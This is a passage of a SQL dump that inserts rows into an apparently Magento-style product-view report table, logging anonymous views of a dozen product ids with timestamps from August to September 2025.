(19210, NULL, NULL, 2061, 1, '2025-08-15 19:23:43'),
(19211, NULL, NULL, 2063, 1, '2025-08-15 19:24:21'),
(19212, NULL, NULL, 2061, 1, '2025-08-15 19:24:28'),
(19213, NULL, NULL, 2059, 1, '2025-08-15 19:24:35'),
(19214, NULL, NULL, 2058, 1, '2025-08-15 19:24:42'),
(19215, NULL, NULL, 2055, 1, '2025-08-15 19:24:48'),
(19216, NULL, NULL, 2054, 1, '2025-08-15 19:24:54'),
(19217, NULL, NULL, 2060, 1, '2025-08-15 19:25:02'),
(19218, NULL, NULL, 2061, 1, '2025-08-15 19:32:40'),
(19219, NULL, NULL, 2062, 1, '2025-08-15 19:57:57'),
(19220, NULL, NULL, 2061, 1, '2025-08-15 20:53:40'),
(19221, NULL, NULL, 2058, 1, '2025-08-15 20:57:58'),
(19222, NULL, NULL, 2054, 1, '2025-08-15 21:12:52'),
(19223, NULL, NULL, 2059, 1, '2025-08-15 21:29:20'),
(19224, NULL, NULL, 2064, 1, '2025-08-15 21:43:20'),
(19225, NULL, NULL, 2063, 1, '2025-08-15 22:29:55'),
(19226, NULL, NULL, 2063, 1, '2025-08-15 22:49:24'),
(19227, NULL, NULL, 2062, 1, '2025-08-15 22:49:28'),
(19228, NULL, NULL, 2061, 1, '2025-08-15 22:49:36'),
(19229, NULL, NULL, 2063, 1, '2025-08-15 23:20:10'),
(19230, NULL, NULL, 2061, 1, '2025-08-15 23:46:28'),
(19231, NULL, NULL, 2061, 1, '2025-08-16 02:34:57'),
(19232, NULL, NULL, 2062, 1, '2025-08-16 04:37:29'),
(19233, NULL, NULL, 2060, 1, '2025-08-16 04:54:00'),
(19234, NULL, NULL, 2060, 1, '2025-08-16 05:34:06'),
(19235, NULL, NULL, 2063, 1, '2025-08-16 05:59:19'),
(19236, NULL, NULL, 2060, 1, '2025-08-16 06:12:03'),
(19237, NULL, NULL, 2061, 1, '2025-08-16 06:35:47'),
(19238, NULL, NULL, 2060, 1, '2025-08-16 06:37:41'),
(19239, NULL, NULL, 2061, 1, '2025-08-16 08:22:45'),
(19240, NULL, NULL, 2060, 1, '2025-08-16 08:23:15'),
(19241, NULL, NULL, 2061, 1, '2025-08-16 08:44:05'),
(19242, NULL, NULL, 2061, 1, '2025-08-16 09:29:59'),
(19243, NULL, NULL, 2061, 1, '2025-08-16 10:26:07'),
(19244, NULL, NULL, 2061, 1, '2025-08-16 13:19:35'),
(19245, NULL, NULL, 2062, 1, '2025-08-16 13:55:38'),
(19246, NULL, NULL, 2062, 1, '2025-08-16 14:35:52'),
(19247, NULL, NULL, 2061, 1, '2025-08-16 14:42:39'),
(19248, NULL, NULL, 2053, 1, '2025-08-16 15:31:06'),
(19249, NULL, NULL, 2064, 1, '2025-08-16 17:57:54'),
(19250, NULL, NULL, 2059, 1, '2025-08-16 18:11:00'),
(19251, NULL, NULL, 2061, 1, '2025-08-16 18:37:22'),
(19252, NULL, NULL, 2058, 1, '2025-08-16 18:39:23'),
(19253, NULL, NULL, 2055, 1, '2025-08-16 18:50:13'),
(19254, NULL, NULL, 2053, 1, '2025-08-16 20:00:45'),
(19255, NULL, NULL, 2064, 1, '2025-08-16 20:14:42'),
(19256, NULL, NULL, 2054, 1, '2025-08-16 22:07:44'),
(19257, NULL, NULL, 2063, 1, '2025-08-16 22:29:54'),
(19258, NULL, NULL, 2061, 1, '2025-08-16 22:41:09'),
(19259, NULL, NULL, 2060, 1, '2025-08-16 23:00:56'),
(19260, NULL, NULL, 2058, 1, '2025-08-16 23:33:33'),
(19261, NULL, NULL, 2060, 1, '2025-08-17 01:47:15'),
(19262, NULL, NULL, 2063, 1, '2025-08-17 02:08:40'),
(19263, NULL, NULL, 2058, 1, '2025-08-17 02:20:23'),
(19264, NULL, NULL, 2062, 1, '2025-08-17 02:32:13'),
(19265, NULL, NULL, 2054, 1, '2025-08-17 02:34:05'),
(19266, NULL, NULL, 2063, 1, '2025-08-17 02:35:01'),
(19267, NULL, NULL, 2059, 1, '2025-08-17 02:36:59'),
(19268, NULL, NULL, 2054, 1, '2025-08-17 02:55:53'),
(19269, NULL, NULL, 2062, 1, '2025-08-17 03:02:25'),
(19270, NULL, NULL, 2060, 1, '2025-08-17 03:16:13'),
(19271, NULL, NULL, 2053, 1, '2025-08-17 04:01:58'),
(19272, NULL, NULL, 2053, 1, '2025-08-17 04:41:36'),
(19273, NULL, NULL, 2061, 1, '2025-08-17 06:29:50'),
(19274, NULL, NULL, 2053, 1, '2025-08-17 06:31:28'),
(19275, NULL, NULL, 2061, 1, '2025-08-17 06:53:58'),
(19276, NULL, NULL, 2053, 1, '2025-08-17 07:36:48'),
(19277, NULL, NULL, 2063, 1, '2025-08-17 07:53:11'),
(19278, NULL, NULL, 2064, 1, '2025-08-17 10:38:48'),
(19279, NULL, NULL, 2064, 1, '2025-08-17 10:46:42'),
(19280, NULL, NULL, 2061, 1, '2025-08-17 10:49:06'),
(19281, NULL, NULL, 2062, 1, '2025-08-17 10:50:54'),
(19282, NULL, NULL, 2063, 1, '2025-08-17 10:54:58'),
(19283, NULL, NULL, 2059, 1, '2025-08-17 10:57:07'),
(19284, NULL, NULL, 2062, 1, '2025-08-17 11:33:56'),
(19285, NULL, NULL, 2053, 1, '2025-08-17 11:43:10'),
(19286, NULL, NULL, 2061, 1, '2025-08-17 13:26:18'),
(19287, NULL, NULL, 2062, 1, '2025-08-17 14:54:17'),
(19288, NULL, NULL, 2059, 1, '2025-08-17 16:17:14'),
(19289, NULL, NULL, 2053, 1, '2025-08-17 17:16:43'),
(19290, NULL, NULL, 2061, 1, '2025-08-17 19:08:55'),
(19291, NULL, NULL, 2054, 1, '2025-08-17 19:36:42'),
(19292, NULL, NULL, 2053, 1, '2025-08-17 20:29:03'),
(19293, NULL, NULL, 2061, 1, '2025-08-17 22:12:19'),
(19294, NULL, NULL, 2053, 1, '2025-08-17 23:06:13'),
(19295, NULL, NULL, 2053, 1, '2025-08-18 00:05:03'),
(19296, NULL, NULL, 2061, 1, '2025-08-18 00:41:09'),
(19297, NULL, NULL, 2060, 1, '2025-08-18 02:34:01'),
(19298, NULL, NULL, 2061, 1, '2025-08-18 03:20:29'),
(19299, NULL, NULL, 2061, 1, '2025-08-18 04:46:34'),
(19300, NULL, NULL, 2064, 1, '2025-08-18 04:52:28'),
(19301, NULL, NULL, 2061, 1, '2025-08-18 05:26:35'),
(19302, NULL, NULL, 2060, 1, '2025-08-18 06:34:05'),
(19303, NULL, NULL, 2059, 1, '2025-08-18 06:34:08'),
(19304, NULL, NULL, 2061, 1, '2025-08-18 08:07:45'),
(19305, NULL, NULL, 2061, 1, '2025-08-18 09:44:54'),
(19306, NULL, NULL, 2061, 1, '2025-08-18 09:59:13'),
(19307, NULL, NULL, 2061, 1, '2025-08-18 10:17:25'),
(19308, NULL, NULL, 2061, 1, '2025-08-18 11:23:48'),
(19309, NULL, NULL, 2055, 1, '2025-08-18 11:55:44'),
(19310, NULL, NULL, 2061, 1, '2025-08-18 12:23:41'),
(19311, NULL, NULL, 2061, 1, '2025-08-18 13:23:41'),
(19312, NULL, NULL, 2062, 1, '2025-08-18 16:06:04'),
(19313, NULL, NULL, 2061, 1, '2025-08-18 16:25:26'),
(19314, NULL, NULL, 2059, 1, '2025-08-18 19:55:14'),
(19315, NULL, NULL, 2054, 1, '2025-08-18 21:48:22'),
(19316, NULL, NULL, 2063, 1, '2025-08-18 23:55:58'),
(19317, NULL, NULL, 2059, 1, '2025-08-19 00:42:47'),
(19318, NULL, NULL, 2060, 1, '2025-08-19 02:45:09'),
(19319, NULL, NULL, 2053, 1, '2025-08-19 03:43:13'),
(19320, NULL, NULL, 2058, 1, '2025-08-19 08:51:28'),
(19321, NULL, NULL, 2064, 1, '2025-08-19 09:16:02'),
(19322, NULL, NULL, 2054, 1, '2025-08-19 11:52:59'),
(19323, NULL, NULL, 2060, 1, '2025-08-19 12:02:25'),
(19324, NULL, NULL, 2058, 1, '2025-08-19 13:52:01'),
(19325, NULL, NULL, 2055, 1, '2025-08-19 14:28:24'),
(19326, NULL, NULL, 2053, 1, '2025-08-19 16:55:15'),
(19327, NULL, NULL, 2059, 1, '2025-08-19 16:59:19'),
(19328, NULL, NULL, 2062, 1, '2025-08-19 17:20:38'),
(19329, NULL, NULL, 2064, 1, '2025-08-19 19:30:37'),
(19330, NULL, NULL, 2058, 1, '2025-08-19 19:39:34'),
(19331, NULL, NULL, 2054, 1, '2025-08-19 19:39:42'),
(19332, NULL, NULL, 2059, 1, '2025-08-19 21:26:45'),
(19333, NULL, NULL, 2060, 1, '2025-08-19 21:34:52'),
(19334, NULL, NULL, 2061, 1, '2025-08-19 21:38:54'),
(19335, NULL, NULL, 2062, 1, '2025-08-19 21:38:55'),
(19336, NULL, NULL, 2058, 1, '2025-08-19 21:41:24'),
(19337, NULL, NULL, 2059, 1, '2025-08-19 21:41:42'),
(19338, NULL, NULL, 2061, 1, '2025-08-19 22:46:32'),
(19339, NULL, NULL, 2054, 1, '2025-08-19 23:40:07'),
(19340, NULL, NULL, 2060, 1, '2025-08-19 23:58:05'),
(19341, NULL, NULL, 2063, 1, '2025-08-20 00:27:34'),
(19342, NULL, NULL, 2053, 1, '2025-08-20 00:43:33'),
(19343, NULL, NULL, 2063, 1, '2025-08-20 02:38:44'),
(19344, NULL, NULL, 2060, 1, '2025-08-20 05:17:40'),
(19345, NULL, NULL, 2061, 1, '2025-08-20 07:03:49'),
(19346, NULL, NULL, 2055, 1, '2025-08-20 08:45:21'),
(19347, NULL, NULL, 2053, 1, '2025-08-20 12:43:01'),
(19348, NULL, NULL, 2060, 1, '2025-08-20 13:40:06'),
(19349, NULL, NULL, 2064, 1, '2025-08-20 13:47:36'),
(19350, NULL, NULL, 2063, 1, '2025-08-20 13:52:30'),
(19351, NULL, NULL, 2064, 1, '2025-08-20 14:25:50'),
(19352, NULL, NULL, 2054, 1, '2025-08-20 14:36:22'),
(19353, NULL, NULL, 2062, 1, '2025-08-20 15:23:47'),
(19354, NULL, NULL, 2061, 1, '2025-08-20 16:19:25'),
(19355, NULL, NULL, 2053, 1, '2025-08-20 19:37:45'),
(19356, NULL, NULL, 2053, 1, '2025-08-20 19:41:10'),
(19357, NULL, NULL, 2064, 1, '2025-08-20 19:52:16'),
(19358, NULL, NULL, 2062, 1, '2025-08-21 03:16:07'),
(19359, NULL, NULL, 2060, 1, '2025-08-21 04:55:52'),
(19360, NULL, NULL, 2059, 1, '2025-08-21 05:52:49'),
(19361, NULL, NULL, 2053, 1, '2025-08-21 06:55:53'),
(19362, NULL, NULL, 2061, 1, '2025-08-21 08:10:37'),
(19363, NULL, NULL, 2055, 1, '2025-08-21 09:55:49'),
(19364, NULL, NULL, 2061, 1, '2025-08-21 11:49:03'),
(19365, NULL, NULL, 2058, 1, '2025-08-21 13:57:43'),
(19366, NULL, NULL, 2062, 1, '2025-08-21 15:35:20'),
(19367, NULL, NULL, 2053, 1, '2025-08-21 15:47:00'),
(19368, NULL, NULL, 2058, 1, '2025-08-21 16:23:51'),
(19369, NULL, NULL, 2064, 1, '2025-08-21 16:55:15'),
(19370, NULL, NULL, 2063, 1, '2025-08-21 17:04:13'),
(19371, NULL, NULL, 2059, 1, '2025-08-21 17:35:03'),
(19372, NULL, NULL, 2064, 1, '2025-08-21 17:55:28'),
(19373, NULL, NULL, 2064, 1, '2025-08-21 18:14:19'),
(19374, NULL, NULL, 2059, 1, '2025-08-21 18:54:48'),
(19375, NULL, NULL, 2060, 1, '2025-08-22 01:11:34'),
(19376, NULL, NULL, 2061, 1, '2025-08-22 01:18:29'),
(19377, NULL, NULL, 2058, 1, '2025-08-22 01:31:06'),
(19378, NULL, NULL, 2055, 1, '2025-08-22 01:39:30'),
(19379, NULL, NULL, 2054, 1, '2025-08-22 01:47:23'),
(19380, NULL, NULL, 2053, 1, '2025-08-22 01:55:15'),
(19381, NULL, NULL, 2061, 1, '2025-08-22 02:18:06'),
(19382, NULL, NULL, 2054, 1, '2025-08-22 02:49:51'),
(19383, NULL, NULL, 2058, 1, '2025-08-22 03:00:06'),
(19384, NULL, NULL, 2060, 1, '2025-08-22 04:28:24'),
(19385, NULL, NULL, 2059, 1, '2025-08-22 04:30:03'),
(19386, NULL, NULL, 2061, 1, '2025-08-22 05:32:28'),
(19387, NULL, NULL, 2055, 1, '2025-08-22 05:44:52'),
(19388, NULL, NULL, 2064, 1, '2025-08-22 05:44:55'),
(19389, NULL, NULL, 2061, 1, '2025-08-22 05:44:59'),
(19390, NULL, NULL, 2058, 1, '2025-08-22 05:45:01'),
(19391, NULL, NULL, 2055, 1, '2025-08-22 07:17:08'),
(19392, NULL, NULL, 2062, 1, '2025-08-22 09:24:04'),
(19393, NULL, NULL, 2061, 1, '2025-08-22 10:13:57'),
(19394, NULL, NULL, 2060, 1, '2025-08-22 10:33:46'),
(19395, NULL, NULL, 2064, 1, '2025-08-22 11:05:01'),
(19396, NULL, NULL, 2063, 1, '2025-08-22 13:43:01'),
(19397, NULL, NULL, 2058, 1, '2025-08-22 13:48:25'),
(19398, NULL, NULL, 2055, 1, '2025-08-22 13:54:56'),
(19399, NULL, NULL, 2060, 1, '2025-08-22 14:12:33'),
(19400, NULL, NULL, 2060, 1, '2025-08-22 15:05:55'),
(19401, NULL, NULL, 2062, 1, '2025-08-22 15:25:01'),
(19402, NULL, NULL, 2062, 1, '2025-08-22 15:25:06'),
(19403, NULL, NULL, 2063, 1, '2025-08-22 16:04:46'),
(19404, NULL, NULL, 2064, 1, '2025-08-22 21:39:30'),
(19405, NULL, NULL, 2063, 1, '2025-08-22 22:54:55'),
(19406, NULL, NULL, 2062, 1, '2025-08-22 22:54:58'),
(19407, NULL, NULL, 2061, 1, '2025-08-22 22:55:08'),
(19408, NULL, NULL, 2061, 1, '2025-08-22 23:30:36'),
(19409, NULL, NULL, 2054, 1, '2025-08-23 00:38:52'),
(19410, NULL, NULL, 2060, 1, '2025-08-23 02:29:33'),
(19411, NULL, NULL, 2053, 1, '2025-08-23 03:10:07'),
(19412, NULL, NULL, 2053, 1, '2025-08-23 06:11:54'),
(19413, NULL, NULL, 2063, 1, '2025-08-23 10:39:46'),
(19414, NULL, NULL, 2061, 1, '2025-08-23 13:40:57'),
(19415, NULL, NULL, 2062, 1, '2025-08-23 15:36:56'),
(19416, NULL, NULL, 2061, 1, '2025-08-23 17:31:17'),
(19417, NULL, NULL, 2064, 1, '2025-08-24 05:07:48'),
(19418, NULL, NULL, 2060, 1, '2025-08-24 07:15:57'),
(19419, NULL, NULL, 2059, 1, '2025-08-24 07:16:03'),
(19420, NULL, NULL, 2061, 1, '2025-08-24 07:58:37'),
(19421, NULL, NULL, 2063, 1, '2025-08-24 10:00:27'),
(19422, NULL, NULL, 2064, 1, '2025-08-24 11:01:25'),
(19423, NULL, NULL, 2055, 1, '2025-08-24 12:20:40'),
(19424, NULL, NULL, 2062, 1, '2025-08-24 16:15:33'),
(19425, NULL, NULL, 2053, 1, '2025-08-24 19:48:36'),
(19426, NULL, NULL, 2064, 1, '2025-08-24 21:46:37'),
(19427, NULL, NULL, 2061, 1, '2025-08-25 01:49:11'),
(19428, NULL, NULL, 2062, 1, '2025-08-25 03:50:07'),
(19429, NULL, NULL, 2060, 1, '2025-08-25 04:45:55'),
(19430, NULL, NULL, 2060, 1, '2025-08-25 06:43:31'),
(19431, NULL, NULL, 2062, 1, '2025-08-25 10:33:18'),
(19432, NULL, NULL, 2053, 1, '2025-08-25 12:23:45');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(19433, NULL, NULL, 2062, 1, '2025-08-25 13:26:16'),
(19434, NULL, NULL, 2062, 1, '2025-08-25 16:15:45'),
(19435, NULL, NULL, 2059, 1, '2025-08-25 18:48:13'),
(19436, NULL, NULL, 2064, 1, '2025-08-25 19:24:22'),
(19437, NULL, NULL, 2060, 1, '2025-08-25 19:33:34'),
(19438, NULL, NULL, 2054, 1, '2025-08-25 21:48:37'),
(19439, NULL, NULL, 2064, 1, '2025-08-26 07:40:45'),
(19440, NULL, NULL, 2058, 1, '2025-08-26 08:41:37'),
(19441, NULL, NULL, 2062, 1, '2025-08-26 13:50:10'),
(19442, NULL, NULL, 2055, 1, '2025-08-26 14:54:56'),
(19443, NULL, NULL, 2061, 1, '2025-08-26 16:18:36'),
(19444, NULL, NULL, 2058, 1, '2025-08-26 16:28:54'),
(19445, NULL, NULL, 2061, 1, '2025-08-26 16:34:37'),
(19446, NULL, NULL, 2055, 1, '2025-08-26 16:38:20'),
(19447, NULL, NULL, 2054, 1, '2025-08-26 16:49:46'),
(19448, NULL, NULL, 2064, 1, '2025-08-26 17:09:00'),
(19449, NULL, NULL, 2053, 1, '2025-08-26 17:11:29'),
(19450, NULL, NULL, 2060, 1, '2025-08-26 18:15:41'),
(19451, NULL, NULL, 2054, 1, '2025-08-26 19:10:57'),
(19452, NULL, NULL, 2058, 1, '2025-08-26 19:52:33'),
(19453, NULL, NULL, 2054, 1, '2025-08-26 19:52:41'),
(19454, NULL, NULL, 2059, 1, '2025-08-27 01:07:30'),
(19455, NULL, NULL, 2059, 1, '2025-08-27 01:25:57'),
(19456, NULL, NULL, 2063, 1, '2025-08-27 01:27:24'),
(19457, NULL, NULL, 2064, 1, '2025-08-27 01:27:34'),
(19458, NULL, NULL, 2062, 1, '2025-08-27 01:27:54'),
(19459, NULL, NULL, 2061, 1, '2025-08-27 01:28:52'),
(19460, NULL, NULL, 2054, 1, '2025-08-27 01:31:40'),
(19461, NULL, NULL, 2058, 1, '2025-08-27 01:43:13'),
(19462, NULL, NULL, 2064, 1, '2025-08-27 01:56:05'),
(19463, NULL, NULL, 2053, 1, '2025-08-27 02:06:59'),
(19464, NULL, NULL, 2063, 1, '2025-08-27 02:09:06'),
(19465, NULL, NULL, 2055, 1, '2025-08-27 02:10:13'),
(19466, NULL, NULL, 2062, 1, '2025-08-27 02:27:39'),
(19467, NULL, NULL, 2059, 1, '2025-08-27 02:36:26'),
(19468, NULL, NULL, 2063, 1, '2025-08-27 02:56:53'),
(19469, NULL, NULL, 2062, 1, '2025-08-27 03:25:02'),
(19470, NULL, NULL, 2060, 1, '2025-08-27 03:43:15'),
(19471, NULL, NULL, 2053, 1, '2025-08-27 06:40:47'),
(19472, NULL, NULL, 2064, 1, '2025-08-27 06:58:26'),
(19473, NULL, NULL, 2053, 1, '2025-08-27 07:16:55'),
(19474, NULL, NULL, 2061, 1, '2025-08-27 07:43:10'),
(19475, NULL, NULL, 2060, 1, '2025-08-27 09:16:59'),
(19476, NULL, NULL, 2060, 1, '2025-08-27 09:51:05'),
(19477, NULL, NULL, 2060, 1, '2025-08-27 12:54:10'),
(19478, NULL, NULL, 2062, 1, '2025-08-27 13:27:25'),
(19479, NULL, NULL, 2060, 1, '2025-08-27 14:31:41'),
(19480, NULL, NULL, 2062, 1, '2025-08-27 16:39:39'),
(19481, NULL, NULL, 2058, 1, '2025-08-27 16:43:24'),
(19482, NULL, NULL, 2055, 1, '2025-08-27 16:47:44'),
(19483, NULL, NULL, 2060, 1, '2025-08-27 16:55:19'),
(19484, NULL, NULL, 2060, 1, '2025-08-27 19:54:50'),
(19485, NULL, NULL, 2063, 1, '2025-08-27 20:01:26'),
(19486, NULL, NULL, 2060, 1, '2025-08-27 20:23:00'),
(19487, NULL, NULL, 2063, 1, '2025-08-27 20:29:16'),
(19488, NULL, NULL, 2058, 1, '2025-08-27 20:46:53'),
(19489, NULL, NULL, 2061, 1, '2025-08-27 20:55:36'),
(19490, NULL, NULL, 2060, 1, '2025-08-27 20:55:53'),
(19491, NULL, NULL, 2055, 1, '2025-08-27 21:21:10'),
(19492, NULL, NULL, 2059, 1, '2025-08-27 22:11:25'),
(19493, NULL, NULL, 2061, 1, '2025-08-27 22:21:54'),
(19494, NULL, NULL, 2059, 1, '2025-08-27 22:51:17'),
(19495, NULL, NULL, 2062, 1, '2025-08-27 22:54:35'),
(19496, NULL, NULL, 2054, 1, '2025-08-27 23:52:53'),
(19497, NULL, NULL, 2059, 1, '2025-08-28 00:05:23'),
(19498, NULL, NULL, 2064, 1, '2025-08-28 00:15:58'),
(19499, NULL, NULL, 2060, 1, '2025-08-28 00:52:23'),
(19500, NULL, NULL, 2063, 1, '2025-08-28 00:59:23'),
(19501, NULL, NULL, 2058, 1, '2025-08-28 01:19:14'),
(19502, NULL, NULL, 2055, 1, '2025-08-28 01:58:21'),
(19503, NULL, NULL, 2061, 1, '2025-08-28 02:58:13'),
(19504, NULL, NULL, 2062, 1, '2025-08-28 03:29:42'),
(19505, NULL, NULL, 2054, 1, '2025-08-28 04:27:05'),
(19506, NULL, NULL, 2059, 1, '2025-08-28 04:39:20'),
(19507, NULL, NULL, 2064, 1, '2025-08-28 04:49:37'),
(19508, NULL, NULL, 2062, 1, '2025-08-28 04:54:43'),
(19509, NULL, NULL, 2058, 1, '2025-08-28 05:57:25'),
(19510, NULL, NULL, 2064, 1, '2025-08-28 06:09:25'),
(19511, NULL, NULL, 2062, 1, '2025-08-28 07:01:26'),
(19512, NULL, NULL, 2064, 1, '2025-08-28 07:10:06'),
(19513, NULL, NULL, 2058, 1, '2025-08-28 08:10:06'),
(19514, NULL, NULL, 2063, 1, '2025-08-28 08:50:06'),
(19515, NULL, NULL, 2062, 1, '2025-08-28 14:00:30'),
(19516, NULL, NULL, 2063, 1, '2025-08-28 16:27:43'),
(19517, NULL, NULL, 2059, 1, '2025-08-28 18:16:13'),
(19518, NULL, NULL, 2054, 1, '2025-08-28 22:12:50'),
(19519, NULL, NULL, 2053, 1, '2025-08-28 23:22:13'),
(19520, NULL, NULL, 2053, 1, '2025-08-29 01:53:13'),
(19521, NULL, NULL, 2061, 1, '2025-08-29 02:29:55'),
(19522, NULL, NULL, 2060, 1, '2025-08-29 03:24:55'),
(19523, NULL, NULL, 2060, 1, '2025-08-29 05:43:53'),
(19524, NULL, NULL, 2061, 1, '2025-08-29 05:50:07'),
(19525, NULL, NULL, 2061, 1, '2025-08-29 07:54:51'),
(19526, NULL, NULL, 2053, 1, '2025-08-29 09:07:03'),
(19527, NULL, NULL, 2060, 1, '2025-08-29 10:11:25'),
(19528, NULL, NULL, 2060, 1, '2025-08-29 10:16:35'),
(19529, NULL, NULL, 2053, 1, '2025-08-29 10:31:19'),
(19530, NULL, NULL, 2062, 1, '2025-08-29 13:45:28'),
(19531, NULL, NULL, 2061, 1, '2025-08-29 17:00:17'),
(19532, NULL, NULL, 2053, 1, '2025-08-29 18:53:27'),
(19533, NULL, NULL, 2061, 1, '2025-08-29 22:44:31'),
(19534, NULL, NULL, 2063, 1, '2025-08-29 22:44:35'),
(19535, NULL, NULL, 2062, 1, '2025-08-29 22:44:39'),
(19536, NULL, NULL, 2063, 1, '2025-08-29 22:48:58'),
(19537, NULL, NULL, 2061, 1, '2025-08-29 23:38:35'),
(19538, NULL, NULL, 2060, 1, '2025-08-30 00:18:57'),
(19539, NULL, NULL, 2060, 1, '2025-08-30 04:57:30'),
(19540, NULL, NULL, 2059, 1, '2025-08-30 07:21:47'),
(19541, NULL, NULL, 2053, 1, '2025-08-30 08:14:42'),
(19542, NULL, NULL, 2053, 1, '2025-08-30 09:08:35'),
(19543, NULL, NULL, 2054, 1, '2025-08-30 14:06:54'),
(19544, NULL, NULL, 2063, 1, '2025-08-30 14:08:37'),
(19545, NULL, NULL, 2053, 1, '2025-08-30 14:13:56'),
(19546, NULL, NULL, 2061, 1, '2025-08-30 20:11:17'),
(19547, NULL, NULL, 2061, 1, '2025-08-30 20:13:01'),
(19548, NULL, NULL, 2060, 1, '2025-08-30 20:14:25'),
(19549, NULL, NULL, 2053, 1, '2025-08-31 02:16:46'),
(19550, NULL, NULL, 2053, 1, '2025-08-31 03:20:40'),
(19551, NULL, NULL, 2058, 1, '2025-08-31 03:31:55'),
(19552, NULL, NULL, 2064, 1, '2025-08-31 04:46:20'),
(19553, NULL, NULL, 2060, 1, '2025-08-31 06:38:11'),
(19554, NULL, NULL, 2059, 1, '2025-08-31 06:38:18'),
(19555, NULL, NULL, 2058, 1, '2025-08-31 07:55:20'),
(19556, NULL, NULL, 2064, 1, '2025-08-31 07:55:28'),
(19557, NULL, NULL, 2062, 1, '2025-08-31 07:55:35'),
(19558, NULL, NULL, 2055, 1, '2025-08-31 07:55:36'),
(19559, NULL, NULL, 2054, 1, '2025-08-31 07:55:38'),
(19560, NULL, NULL, 2059, 1, '2025-08-31 07:55:42'),
(19561, NULL, NULL, 2063, 1, '2025-08-31 07:55:44'),
(19562, NULL, NULL, 2060, 1, '2025-08-31 07:55:47'),
(19563, NULL, NULL, 2061, 1, '2025-08-31 07:55:48'),
(19564, NULL, NULL, 2058, 1, '2025-08-31 07:56:04'),
(19565, NULL, NULL, 2064, 1, '2025-08-31 07:56:10'),
(19566, NULL, NULL, 2062, 1, '2025-08-31 07:56:18'),
(19567, NULL, NULL, 2055, 1, '2025-08-31 07:56:21'),
(19568, NULL, NULL, 2059, 1, '2025-08-31 07:56:25'),
(19569, NULL, NULL, 2054, 1, '2025-08-31 07:56:26'),
(19570, NULL, NULL, 2063, 1, '2025-08-31 07:56:29'),
(19571, NULL, NULL, 2061, 1, '2025-08-31 07:56:30'),
(19572, NULL, NULL, 2060, 1, '2025-08-31 07:56:33'),
(19573, NULL, NULL, 2053, 1, '2025-08-31 07:56:43'),
(19574, NULL, NULL, 2053, 1, '2025-08-31 08:04:44'),
(19575, NULL, NULL, 2064, 1, '2025-08-31 09:10:58'),
(19576, NULL, NULL, 2061, 1, '2025-08-31 10:16:15'),
(19577, NULL, NULL, 2060, 1, '2025-08-31 10:21:28'),
(19578, NULL, NULL, 2055, 1, '2025-08-31 11:49:02'),
(19579, NULL, NULL, 2060, 1, '2025-08-31 12:20:30'),
(19580, NULL, NULL, 2063, 1, '2025-08-31 13:02:56'),
(19581, NULL, NULL, 2062, 1, '2025-08-31 15:31:21'),
(19582, NULL, NULL, 2063, 1, '2025-08-31 16:00:45'),
(19583, NULL, NULL, 2053, 1, '2025-08-31 16:04:36'),
(19584, NULL, NULL, 2061, 1, '2025-08-31 17:38:45'),
(19585, NULL, NULL, 2060, 1, '2025-08-31 20:49:12'),
(19586, NULL, NULL, 2060, 1, '2025-08-31 23:29:26'),
(19587, NULL, NULL, 2064, 1, '2025-09-01 01:01:52'),
(19588, NULL, NULL, 2063, 1, '2025-09-01 01:14:41'),
(19589, NULL, NULL, 2061, 1, '2025-09-01 01:52:37'),
(19590, NULL, NULL, 2064, 1, '2025-09-01 01:59:52'),
(19591, NULL, NULL, 2053, 1, '2025-09-01 03:34:54'),
(19592, NULL, NULL, 2060, 1, '2025-09-01 06:03:50'),
(19593, NULL, NULL, 2061, 1, '2025-09-01 06:17:18'),
(19594, NULL, NULL, 2053, 1, '2025-09-01 06:45:34'),
(19595, NULL, NULL, 2059, 1, '2025-09-01 07:29:49'),
(19596, NULL, NULL, 2060, 1, '2025-09-01 07:53:35'),
(19597, NULL, NULL, 2058, 1, '2025-09-01 08:00:52'),
(19598, NULL, NULL, 2055, 1, '2025-09-01 08:12:37'),
(19599, NULL, NULL, 2054, 1, '2025-09-01 08:20:36'),
(19600, NULL, NULL, 2062, 1, '2025-09-01 09:20:14'),
(19601, NULL, NULL, 2064, 1, '2025-09-01 10:46:19'),
(19602, NULL, NULL, 2058, 1, '2025-09-01 10:47:41'),
(19603, NULL, NULL, 2064, 1, '2025-09-01 12:00:48'),
(19604, NULL, NULL, 2054, 1, '2025-09-01 12:06:35'),
(19605, NULL, NULL, 2061, 1, '2025-09-01 12:09:16'),
(19606, NULL, NULL, 2062, 1, '2025-09-01 15:36:58'),
(19607, NULL, NULL, 2053, 1, '2025-09-01 20:10:58'),
(19608, NULL, NULL, 2062, 1, '2025-09-01 20:11:45'),
(19609, NULL, NULL, 2059, 1, '2025-09-01 20:14:53'),
(19610, NULL, NULL, 2054, 1, '2025-09-01 20:19:53'),
(19611, NULL, NULL, 2053, 1, '2025-09-01 20:59:08'),
(19612, NULL, NULL, 2054, 1, '2025-09-01 21:41:30'),
(19613, NULL, NULL, 2061, 1, '2025-09-02 01:53:44'),
(19614, NULL, NULL, 2062, 1, '2025-09-02 07:59:40'),
(19615, NULL, NULL, 2060, 1, '2025-09-02 08:30:28'),
(19616, NULL, NULL, 2058, 1, '2025-09-02 08:50:38'),
(19617, NULL, NULL, 2061, 1, '2025-09-02 10:19:02'),
(19618, NULL, NULL, 2060, 1, '2025-09-02 14:39:35'),
(19619, NULL, NULL, 2053, 1, '2025-09-02 14:42:16'),
(19620, NULL, NULL, 2062, 1, '2025-09-02 15:30:28'),
(19621, NULL, NULL, 2053, 1, '2025-09-02 15:31:37'),
(19622, NULL, NULL, 2058, 1, '2025-09-02 19:44:13'),
(19623, NULL, NULL, 2054, 1, '2025-09-02 19:44:22'),
(19624, NULL, NULL, 2061, 1, '2025-09-02 20:10:45'),
(19625, NULL, NULL, 2061, 1, '2025-09-02 21:57:32'),
(19626, NULL, NULL, 2060, 1, '2025-09-02 22:57:55'),
(19627, NULL, NULL, 2058, 1, '2025-09-02 23:47:07'),
(19628, NULL, NULL, 2054, 1, '2025-09-03 08:08:10'),
(19629, NULL, NULL, 2055, 1, '2025-09-03 08:08:13'),
(19630, NULL, NULL, 2064, 1, '2025-09-03 08:08:19'),
(19631, NULL, NULL, 2063, 1, '2025-09-03 08:08:22'),
(19632, NULL, NULL, 2062, 1, '2025-09-03 08:08:24'),
(19633, NULL, NULL, 2060, 1, '2025-09-03 08:08:26'),
(19634, NULL, NULL, 2059, 1, '2025-09-03 08:08:29'),
(19635, NULL, NULL, 2061, 1, '2025-09-03 08:08:32'),
